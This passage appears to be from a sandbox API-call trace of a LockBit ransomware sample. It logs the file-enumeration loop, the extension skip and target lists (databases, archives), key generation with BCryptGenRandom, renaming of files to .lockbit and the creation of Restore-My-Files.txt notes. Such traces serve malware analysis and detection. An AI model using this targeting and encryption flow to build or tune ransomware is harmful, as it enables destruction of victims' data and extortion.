lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.529] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.529] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14871_.GIF") returned 1 [0203.530] lstrcmpiW (lpString1="ntldr", lpString2="BD14871_.GIF") returned 1 [0203.530] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14871_.GIF") returned 1 [0203.530] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14871_.GIF") returned 1 [0203.530] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14871_.GIF") returned -1 [0203.530] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14871_.GIF") returned 1 [0203.530] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14871_.GIF") returned 1 [0203.530] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.530] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF") returned=".GIF" [0203.530] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.530] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.530] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.531] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.531] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.531] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF.lockbit") returned 78 [0203.531] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14871_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.532] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.532] malloc (_Size=0x40068) returned 0x3df0008 [0203.532] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=194) returned 1 [0203.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.533] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.536] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.536] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.536] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.536] free (_Block=0x1fa2ed8) [0203.536] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14871_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.536] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.537] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c3a5000, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca36b40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6c3a5000, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14980_.GIF", cAlternateFileName="")) returned 1 [0203.537] lstrcmpiW (lpString1=".", lpString2="BD14980_.GIF") returned -1 [0203.537] lstrcmpiW (lpString1="..", lpString2="BD14980_.GIF") returned -1 [0203.537] PathFindExtensionW (pszPath="BD14980_.GIF") returned=".GIF" [0203.537] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.537] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.537] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14980_.GIF") returned 1 [0203.538] lstrcmpiW (lpString1="ntldr", lpString2="BD14980_.GIF") returned 1 [0203.538] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14980_.GIF") returned 1 [0203.538] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14980_.GIF") returned 1 [0203.538] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14980_.GIF") returned -1 [0203.538] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14980_.GIF") returned 1 [0203.538] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14980_.GIF") returned 1 [0203.538] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.538] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF") returned=".GIF" [0203.538] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.538] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.538] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.539] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.539] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.539] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF.lockbit") returned 78 [0203.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14980_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.541] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.541] malloc (_Size=0x40068) returned 0x3df0008 [0203.541] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=463) returned 1 [0203.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.542] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.542] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.545] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.545] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.545] free (_Block=0x1fa2ed8) [0203.545] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14980_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.546] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.546] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6d6b7d00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca36b40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6d6b7d00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x164, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14981_.GIF", cAlternateFileName="")) returned 1 [0203.546] lstrcmpiW (lpString1=".", lpString2="BD14981_.GIF") returned -1 [0203.546] lstrcmpiW (lpString1="..", lpString2="BD14981_.GIF") returned -1 [0203.546] PathFindExtensionW (pszPath="BD14981_.GIF") returned=".GIF" [0203.546] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.546] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.546] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.547] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.547] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.547] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.547] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.547] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14981_.GIF") returned 1 [0203.547] lstrcmpiW (lpString1="ntldr", lpString2="BD14981_.GIF") returned 1 [0203.547] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14981_.GIF") returned 1 [0203.547] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14981_.GIF") returned 1 [0203.547] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14981_.GIF") returned -1 [0203.547] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14981_.GIF") returned 1 [0203.547] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14981_.GIF") returned 1 [0203.547] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.547] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF") returned=".GIF" [0203.548] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.548] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.548] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.548] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF.lockbit") returned 78 [0203.548] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14981_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.550] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.550] malloc (_Size=0x40068) returned 0x3df0008 [0203.550] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=356) returned 1 [0203.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.550] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.551] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.551] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.554] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14981_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: 